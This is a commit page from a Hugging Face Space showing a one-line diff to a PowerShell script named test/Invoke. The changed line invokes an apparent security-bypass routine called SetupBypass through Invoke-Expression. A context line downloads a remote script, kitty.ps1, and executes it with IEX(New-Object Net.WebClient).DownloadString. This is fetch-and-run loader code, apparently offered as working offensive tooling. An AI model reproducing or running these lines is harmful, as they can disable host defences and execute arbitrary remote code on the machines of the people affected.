enotkrutoy commited on
Commit
b48fe4c
·
verified ·
1 Parent(s): 21afbea

Update test/Invoke

Browse files
Files changed (1) hide show
  1. test/Invoke +1 -1
test/Invoke CHANGED
@@ -291,7 +291,7 @@ namespace Test
291
  }
292
  "@
293
 
294
- IEX([Test.Program]::SetupBypass())
295
 
296
  IEX(New-Object Net.WebClient).DownloadString('https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/kitty.ps1')
297
 
 
291
  }
292
  "@
293
 
294
+ IEX -Command ([Test.Program]::SetupBypass())
295
 
296
  IEX(New-Object Net.WebClient).DownloadString('https://huggingface.co/spaces/enotkrutoy/gggg/raw/main/test/kitty.ps1')
297